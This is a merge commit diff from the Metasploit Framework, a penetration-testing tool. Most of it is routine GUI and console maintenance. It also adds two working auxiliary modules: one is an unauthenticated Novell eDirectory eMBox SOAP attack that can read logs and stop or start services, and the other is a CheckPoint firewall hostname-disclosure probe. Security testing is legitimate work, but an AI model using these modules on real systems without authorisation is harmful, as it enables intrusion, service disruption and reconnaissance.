Merge remote branch 'upstream/master'

external/source/gui/msfguijava/src/msfgui/DbConnectDialog.java

@@ -265,6 +265,7 @@ public class DbConnectDialog extends OptionsDialog {
 				token = s.next();
 			}
 		} catch (FileNotFoundException fnfox){
+			fnfox.printStackTrace();
 		}
 		showDefaults();
 	}

external/source/gui/msfguijava/src/msfgui/MainFrame.java

@@ -265,7 +265,8 @@ public class MainFrame extends FrameView {
 						}
 						publish((Object)jobStrings);
 					} catch (MsfException msfEx) {
-						msfEx.printStackTrace();
+						if(!MsfguiApp.shuttingDown || !msfEx.getMessage().contains("Connection refused"))
+							msfEx.printStackTrace();
 						publish("Error getting session list "+msfEx);
 						if(!msfEx.getMessage().contains("timed out")) // on timeout, just retry
 							return new ArrayList();
@@ -1655,6 +1656,7 @@ nameloop:	for (int i = 0; i < names.length; i++) {
 		});
 		jobsList.addMouseListener( new PopupMouseListener() {
 			public void mouseReleased(MouseEvent e){
+				super.mouseReleased(e);
 				int indx = jobsList.locationToIndex(e.getPoint());
 				if (indx == -1)
 					return;

external/source/gui/msfguijava/src/msfgui/MeterpFileBrowser.java

@@ -3,8 +3,6 @@ package msfgui;
 import java.awt.Component;
 import java.awt.event.ActionEvent;
 import java.awt.event.ActionListener;
-import java.awt.event.FocusEvent;
-import java.awt.event.FocusListener;
 import java.awt.event.MouseEvent;
 import java.io.File;
 import java.io.IOException;
@@ -199,8 +197,7 @@ public class MeterpFileBrowser extends MsfFrame {
 	/** Retrieves list of files. */
 	private void getFiles() {
 		//Set up locking so the console doesn't eat our output
-		if(!lock.tryLock())
-			lock.lock();
+		lock.lock();
 
 		while(model.getRowCount() > 0)
 			model.removeRow(0);
@@ -243,10 +240,8 @@ public class MeterpFileBrowser extends MsfFrame {
 					for(int i = 0; i < mainTable.getColumnCount(); i++)
 						if(mainTable.getColumnName(i).equals("Name"))
 							nameColumn = i;
-					if(nameColumn != -1){
+					if(nameColumn != -1)
 						mainTable.moveColumn(nameColumn, 0);
-						stop();
-					}
 				} catch (Exception ex) {
 					ex.printStackTrace();
 					if(ex.getMessage().toLowerCase().contains("unknown session"))

external/source/gui/msfguijava/src/msfgui/OpenConnectionDialog.java

@@ -103,7 +103,6 @@ public class OpenConnectionDialog extends javax.swing.JDialog {
 			String host = info.get("host").toString();
 			int port = Integer.parseInt(info.get("port").toString());
 			boolean ssl = Boolean.parseBoolean(info.get("ssl").toString());
-			String type = info.get("type").toString();
 			RpcConnection rpc = RpcConnection.getConn(username, password.toCharArray(), host, port, ssl);
 			if(javax.swing.JOptionPane.showConfirmDialog(null, "Connect to last remembered rpcd?") == javax.swing.JOptionPane.YES_OPTION)
 				return rpc;

external/source/gui/msfguijava/src/msfgui/ProcessList.java

@@ -57,16 +57,6 @@ public class ProcessList extends MsfFrame {
 		this.rpcConn = rpcConn;
 		this.session = session;
 		this.lock = (ReentrantLock)sessionPopupMap.get(session.get("id")+"lock");
-		((DraggableTabbedPane)tabbedPane).setTabFocusListener(0, new FocusListener() {
-			public void focusGained(FocusEvent e) {
-				if(!lock.tryLock())
-					lock.lock();
-			}
-			public void focusLost(FocusEvent e) {
-				while(lock.getHoldCount() > 0)
-					lock.unlock();
-			}
-		});
 		//See if we need to move our tab
 		Map props = MsfguiApp.getPropertiesNode();
 		if(!props.get("tabWindowPreference").equals("window")){
@@ -74,13 +64,12 @@ public class ProcessList extends MsfFrame {
 					(Component)sessionPopupMap.get(session.get("id")+"console")));
 			DraggableTabbedPane.show(mainPanel);
 		}
-		if(!lock.tryLock())
-			lock.lock();
 		listProcs();
 	}
 
 	/** Lists the processes that are running */
 	protected void listProcs() throws HeadlessException {
+		lock.lock();
 		if (runCommand("ps"))
 			return;
 		readTimer = new Timer(300, new ActionListener() {
@@ -113,6 +102,7 @@ public class ProcessList extends MsfFrame {
 						readTimer.stop();
 					MsfguiApp.showMessage(null, ex.getMessage());
 				}
+				lock.unlock();
 			}
 		});
 		readTimer.start();

lib/msf/ui/console/command_dispatcher/core.rb

@@ -185,19 +185,61 @@ class Core
 			cmd_resource_help
 			return false
 		end
+		
 		args.each do |res|
-			if not File.file? res
+			good_res = nil
+			if (File.file? res and File.readable? res)
+				good_res = res
+			elsif
+				# let's check to see if it's in the scripts/resource dir (like when tab completed)
+				[
+					::Msf::Config.script_directory + File::SEPARATOR + "resource",
+					::Msf::Config.user_script_directory + File::SEPARATOR + "resource"
+				].each do |dir|
+					res_path = dir + File::SEPARATOR + res 
+					if (File.file?(res_path) and File.readable?(res_path))
+						good_res = res_path
+						break
+					end
+				end
+			end
+			if good_res
+				driver.load_resource(good_res)
+			else
 				print_error("#{res} is not a valid resource file")
 				next
 			end
-			driver.load_resource(res)
 		end
 	end
-
+	
+	#
+	# Tab completion for the resource command
+	#
 	def cmd_resource_tabs(str, words)
-		return [] if words.length > 1
-
-		tab_complete_filenames(str, words)
+		tabs = []
+		#return tabs if words.length > 1
+		if ( str and str =~ /^#{Regexp.escape(File::SEPARATOR)}/ )
+			# then you are probably specifying a full path so let's just use normal file completion
+			return tab_complete_filenames(str,words)
+		elsif (not words[1] or not words[1].match(/^\//))
+			# then let's start tab completion in the scripts/resource directories 
+			begin
+				[
+					::Msf::Config.script_directory + File::SEPARATOR + "resource",
+					::Msf::Config.user_script_directory + File::SEPARATOR + "resource"
+				].each do |dir|
+					next if not ::File.exist? dir
+					tabs += ::Dir.new(dir).find_all { |e|
+						path = dir + File::SEPARATOR + e
+						::File.file?(path) and File.readable?(path)
+					}
+				end
+			rescue Exception
+			end
+		else
+			tabs += tab_complete_filenames(str,words)
+		end
+		return tabs
 	end
 
 	def cmd_makerc_help
@@ -902,7 +944,7 @@ class Core
 		if (path !~ /#{File::SEPARATOR}/)
 			plugin_file_name = path
 
-			# If the plugin isn't in the user direcotry (~/.msf3/plugins/), use the base
+			# If the plugin isn't in the user directory (~/.msf3/plugins/), use the base
 			path = Msf::Config.user_plugin_directory + File::SEPARATOR + plugin_file_name
 			if not File.exists?( path  + ".rb" )
 				# If the following "path" doesn't exist it will be caught when we attempt to load
@@ -2132,7 +2174,7 @@ class Core
 	# Returns the revision of the framework and console library
 	#
 	def cmd_version(*args)
-		ver = "$Revision$"
+		ver = "$Revision: 14065 $"
 
 		print_line("Framework: #{Msf::Framework::Version}.#{Msf::Framework::Revision.match(/ (.+?) \$/)[1]}")
 		print_line("Console  : #{Msf::Framework::Version}.#{ver.match(/ (.+?) \$/)[1]}")

modules/auxiliary/admin/edirectory/edirectory_edirutil.rb

@@ -0,0 +1,156 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Novell eDirectory eMBox Unauthenticated File Access',
+			'Description'    => %q{
+					This module will access Novell eDirectory's eMBox service and can run the
+				following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,
+				STOP_SERVICE, START_SERVICE, SET_LOGFILE.
+			},
+			'References'     =>
+				[
+					[ 'CVE', '2008-0926' ],
+					[ 'BID', '28441' ],
+					[ 'OSVDB', '43690' ]
+				],
+			'Author'         =>
+				[
+					'Nicob',
+					'MC',    #Initial Metasploit module
+					'sinn3r'
+				],
+			'License'        => MSF_LICENSE,
+			'Actions'        =>
+				[
+					[
+						'GET_DN',
+						{
+							'Description' => 'Get DN',
+							'CMD'         => 'novell.embox.connmgr.serverinfo',
+							'PATTERN'     => /<ServerDN dt="Binary">(.*)<\/ServerDN>/,
+							'USE_PARAM'   => false
+						}
+					],
+					[
+						'READ_LOGS',
+						{
+							'Description' => 'Read all the log files',
+							'CMD'         => 'logger.readlog',
+							'PATTERN'     => /<LogFileData>(.*)<\/LogFileData>/,
+							'USE_PARAM'   => false
+						}
+					],
+					[
+						'LIST_SERVICES',
+						{
+							'Description' => 'List services',
+							'CMD'         => 'novell.embox.service.getServiceList',
+							'PATTERN'     => /<DSService:Message dt=\"Binary\">(.*)<\/DSService:Message>/,
+							'USE_PARAM'   => false
+						}
+					],
+					[
+						'STOP_SERVICE',
+						{
+							'Description' => 'Stop a service',
+							'CMD'         => 'novell.embox.service.stopService',
+							'PATTERN'     => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
+							'PARAM'       => '<Parameters><params xmlns:DSService="service.dtd">'+
+							                 '<DSService:moduleName>__PARAM__</DSService:moduleName>'+
+							                 '</params></Parameters>',
+							'USE_PARAM'   => true
+						}
+					],
+					[
+						'START_SERVICE',
+						{
+							'Description' => 'Start a service',
+							'CMD'         => 'novell.embox.service.startService',
+							'PATTERN'     => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
+							'PARAM'       => '<Parameters>' + 
+							                 '<params xmlns:DSService="service.dtd">' + 
+							                 '<DSService:moduleName>__PARAM__</DSService:moduleName>'+
+							                 '</params></Parameters>',
+							'USE_PARAM'   => true
+						}
+					],
+					[
+						'SET_LOGFILE',
+						{
+							'Description' => 'Read Log File',
+							'CMD'         => 'logger.setloginfo',
+							'PATTERN'     => /<Logger:Message dt="Binary">(.*)<\/Logger:Message>/,
+							'PARAM'       => '<Parameters><params><logFile>__PARAM__</logFile>'+
+							                 '<logOptionAppend/></params></Parameters>',
+							'USE_PARAM'   => true
+						}
+					]
+				],
+			'DefaultAction'  => 'LIST_SERVICES'
+		))
+
+		register_options(
+			[
+				Opt::RPORT(8028),
+				OptString.new("PARAM", [false, 'Specify a parameter for the action'])
+			], self.class)
+	end
+
+	def run
+
+		if action.opts['USE_PARAM']
+			if datastore['PARAM'].nil? or datastore['PARAM'].empty?
+				print_error("You must supply a parameter for action: #{action.name}")
+				return
+			else
+				param = action.opts['PARAM'].gsub(/__PARAM__/, datastore['PARAM'])
+			end
+		else
+			param = '<Parameters><params/></Parameters>'
+		end
+
+		template = %Q|<?xml version="1.0"?>
+		<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
+		<SOAP-ENV:Header/>
+		<SOAP-ENV:Body>
+		<dispatch>
+		<Action>#{action.opts['CMD']}</Action>
+		<Object/>#{param}</dispatch>
+		</SOAP-ENV:Body>
+		</SOAP-ENV:Envelope>|
+
+		template = template.gsub(/^\t\t/, '')
+		template = template.gsub(/\n/, '')
+
+		connect
+		print_status("Sending command: #{action.name}...")
+		res = send_request_cgi({
+			'method'   => 'POST',
+			'uri'      => '/SOAP',
+			'data'     => template + "\n\n",
+			'headers'  =>
+				{
+					'Content-Type' => 'text/xml',
+					'SOAPAction' => "\"" + Rex::Text.rand_text_alpha_upper(rand(25) + 1) + "\"",
+				}
+		}, 25)
+
+		raw_data = res.body.scan(/#{action.opts['PATTERN']}/).flatten[0]
+		print_line("\n" + Rex::Text.decode_base64(raw_data))
+
+		disconnect
+	end
+end

modules/auxiliary/gather/checkpoint_hostname.rb

@@ -0,0 +1,69 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'CheckPoint Firewall-1 Topology Service Hostname Disclosure',
+			'Description'    => %q{
+				This module sends a query to the TCP port 264 on CheckPoint
+				firewalls to obtain the firewall name and management station
+				(such as SmartCenter) name.
+			},
+			'Author'         => [ 'patrick' ],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					# patrickw - None? Stumbled across, probably an old bug/feature but unsure.
+					[ 'URL', 'http://www.osisecurity.com.au/advisories/' ],
+				]
+		))
+
+		register_options(
+			[
+				Opt::RPORT(264),
+			], self.class)
+	end
+
+	def autofilter
+		false
+	end
+
+	def run
+		print_status("Attempting to contact Checkpoint FW1 Topology service...")
+		connect
+
+		sock.put("\x51\x00\x00\x00")
+		sock.put("\x00\x00\x00\x21")
+		res = sock.get(4)
+		if (res == "Y\x00\x00\x00")
+			print_good("Appears to be a CheckPoint Firewall...")
+			sock.put("\x00\x00\x00\x0bsecuremote\x00")
+			res = sock.get_once
+			if (res =~ /CN\=(.+),O\=(.+)\./i)
+				print_good("Firewall Host: #{$1}")
+				print_good("SmartCenter Host: #{$2}")
+			end
+		else
+			print_error("Unexpected response:\r\n#{res}")
+		end
+
+		disconnect
+	end
+
+end

modules/exploits/multi/http/traq_plugin_exec.rb

@@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
+					[ 'OSVDB', '77556'],
 					[ 'URL', 'http://www.exploit-db.com/exploits/18213/' ],
 					[ 'URL', 'http://traqproject.org/' ],
 				],

modules/exploits/windows/scada/codesys_web_server.rb

@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'      =>
 				[
+					[ 'OSVDB', '77387'],
 					[ 'URL', 'http://aluigi.altervista.org/adv/codesys_1-adv.txt' ],
 					[ 'URL', 'http://www.exploit-db.com/exploits/18187/' ],
 					[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-336-01A.pdf' ]

modules/post/multi/gather/multi_command.rb

@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Post
 		if not ::File.exists?(datastore['RESOURCE'])
 			raise "Resource File does not exists!"
 		else
-			::File.open(datastore['RESOURCE'], "br").each_line do |cmd|
+			::File.open(datastore['RESOURCE'], "rb").each_line do |cmd|
 				next if cmd.strip.length < 1
 				next if cmd[0,1] == "#"
 				begin